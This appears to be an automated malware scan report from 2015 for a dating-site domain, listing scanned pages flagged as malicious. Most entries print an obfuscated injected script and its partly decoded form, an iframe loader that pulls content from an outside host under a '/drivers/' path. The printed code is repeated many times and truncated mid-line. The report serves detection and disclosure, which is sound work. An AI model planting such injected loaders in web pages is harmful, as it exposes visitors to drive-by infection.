Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=top.lovelyrussian.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://top.lovelyrussian.com/ | 200 OK Content-Length: 92092 Content-Type: text/html | clean |
http://top.lovelyrussian.com/accounts.php | 200 OK Content-Length: 28216 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20aj%28Af%29%7Breturn%20Af%7Dtry%7Bfunction%20Oe%28KD%29%7Breturn%20parseInt%28KD%29%7Dvar%20Jw%3D%2755v5Mv5ev58v5fv5nv5Uv5Vv57v5Iv5jv5pv5Av5sv59v5Zv5qv5cv5Cv54v53v56v5Gv5Yv5mv5yv5Fv5Nv5Hv5Lv5Pv5xv5gv5dv5lv5rv5hv5Tv5wv5zv5Rv5Ov5Dv5ov5Xv5tv5iv5kv5av5Sv5bv5Jv5Wv5BvM5vMMvMevM8vMfvMnvMUvMVvM7vMIvMjvMpvMAvMsvM9vMZvMqvMcvMCvM4vM3vM6vMGvMY%27%2C%20Fi%3Daj%28%27v%27%29%3B%20var%20SV%3DArray%28Oe%28%2775%27%29%2COe%28%274%27%29%2C23473%5E Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'udetpaX', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'udetpaX', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://top.lovelyrussian.com/accounts.php?login | 200 OK Content-Length: 28216 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20aj%28Af%29%7Breturn%20Af%7Dtry%7Bfunction%20Oe%28KD%29%7Breturn%20parseInt%28KD%29%7Dvar%20Jw%3D%2755v5Mv5ev58v5fv5nv5Uv5Vv57v5Iv5jv5pv5Av5sv59v5Zv5qv5cv5Cv54v53v56v5Gv5Yv5mv5yv5Fv5Nv5Hv5Lv5Pv5xv5gv5dv5lv5rv5hv5Tv5wv5zv5Rv5Ov5Dv5ov5Xv5tv5iv5kv5av5Sv5bv5Jv5Wv5BvM5vMMvMevM8vMfvMnvMUvMVvM7vMIvMjvMpvMAvMsvM9vMZvMqvMcvMCvM4vM3vM6vMGvMY%27%2C%20Fi%3Daj%28%27v%27%29%3B%20var%20SV%3DArray%28Oe%28%2775%27%29%2COe%28%274%27%29%2C23473%5E Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'udetpaX', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'udetpaX', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=Lapa&url=http%3A%2F%2Flapatulka.net | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=janosch&url=http%3A%2F%2Fwww.cobradvds.com | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=topruss&url=http%3A%2F%2Ftop.russian-mail-order-bride.net%2F | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=dating1&url=http%3A%2F%2Fwww.worldwidetopsites.com%2Fphp%2Fin.php%3Fid%3Dlove44 | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=gero4054&url=http%3A%2F%2Fgallerydating.net | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=world100&url=http%3A%2F%2Fwww.world100.net | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=dati2233&url=http%3A%2F%2Ftop100.wdating.com%2Frankem.asp%3Faction%3Din%26id%3Dbestl | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=AmnaUsma&url=http%3A%2F%2Fwww.activeattractions.com | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=rom100&url=http%3A%2F%2Fonline4romance.com%2Ftopsites | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=dating77&url=http%3A%2F%2Frussian-women-top.whoo.net%3Fwhoo%3D52443800 | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=lucky&url=http%3A%2F%2Fwww.lucky-you.com%2F | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: top.lovelyrussian.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Tue, 20 Jan 2015 18:13:25 GMT
Accept-Ranges: bytes
ETag: "620c26e0-167bc-50d1365598a57"
Server: Apache
Vary: Accept-Encoding
Content-Length: 92092
Content-Type: text/html; charset=windows-1251
Expires: Tue, 20 Jan 2015 18:13:25 GMT
Last-Modified: Tue, 20 Jan 2015 11:03:59 GMT
...92092 bytes of data.
GET / HTTP/1.1
Host: top.lovelyrussian.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Tue, 20 Jan 2015 18:13:25 GMT
Accept-Ranges: bytes
ETag: "620c26e0-167bc-50d1365598a57"
Server: Apache
Vary: Accept-Encoding
Content-Length: 92092
Content-Type: text/html; charset=windows-1251
Expires: Tue, 20 Jan 2015 18:13:25 GMT
Last-Modified: Tue, 20 Jan 2015 11:03:59 GMT
...92092 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: top.lovelyrussian.com
Referer: http://www.google.com/search?q=top.lovelyrussian.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: top.lovelyrussian.com
Referer: http://www.google.com/search?q=top.lovelyrussian.com
Result:
The result is similar to the first query. There are no suspicious redirects found.